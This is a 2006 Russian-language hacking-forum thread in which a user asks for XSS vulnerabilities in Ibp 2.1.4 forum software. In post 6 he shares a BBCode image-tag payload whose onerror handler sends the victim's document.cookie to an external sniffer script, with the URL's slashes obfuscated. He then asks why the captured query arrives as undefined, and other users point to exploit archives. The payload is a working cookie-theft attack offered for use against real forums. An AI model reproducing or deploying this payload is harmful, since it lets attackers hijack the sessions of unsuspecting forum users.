Форумы Уязвимость для Ibp 2.1.4.

Discussion in 'Уязвимости CMS/форумов' started by Medigan, 20 Mar 2006.

Thread Status:
Not open for further replies.
  1. Medigan

    Medigan New Member

    Joined:
    12 Mar 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Люди плиз подскажите есть ли какие нибудь уязвимости ( Желательно Xss) для форумов Ibp 2.1.4.?
    Заранее спасибо.
     
  2. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
  3. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    _________________________
  5. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
  6. Medigan

    Medigan New Member

    Joined:
    12 Mar 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо, надо бы это добавить в топик про полный анализ Ibp, а то я там и искал.
    Но возникла проблема.
    После вставки этого кода
    HTML:
    [img]/[snapback]	onerror=document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63)+document.cookies	tyle=visibility:hidden=	[/snapback].gif[/img]
    Приходят куки на сниффер, но в поле QUERY пишет undefined
    HTML:
    QUERY=undefined
    И еще можно тупой вопрос?
    У нас есть
    HTML:
    http:xxantichat.ruxcgi-binxs.jpg/
    Тут заменен слэш на X, я смотрел различные кодировки для него, но нигде не видел код в виде буквы X. Где можно поподробней про это прочитать?
     
    #6 Medigan, 20 Mar 2006
    Last edited: 20 Mar 2006
  7. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Вот здесь можно прочитать подробнее:
     
  8. Medigan

    Medigan New Member

    Joined:
    12 Mar 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Понял, сенксь...
     
  9. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    а для форума Ibp 2.1.5. кто нить знает уязвимость?
     
  10. Medigan

    Medigan New Member

    Joined:
    12 Mar 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Так никто не знает почему куки неизвестны? Это случайно не хорошо настроенный Internet Explorer?
     
  11. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    Вот тока нах ето надо?? Объясни..
     
  12. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    тема тупа,есть такие ресурсы как милворм,секлаб секьюрити.ннов
     
Thread Status:
Not open for further replies.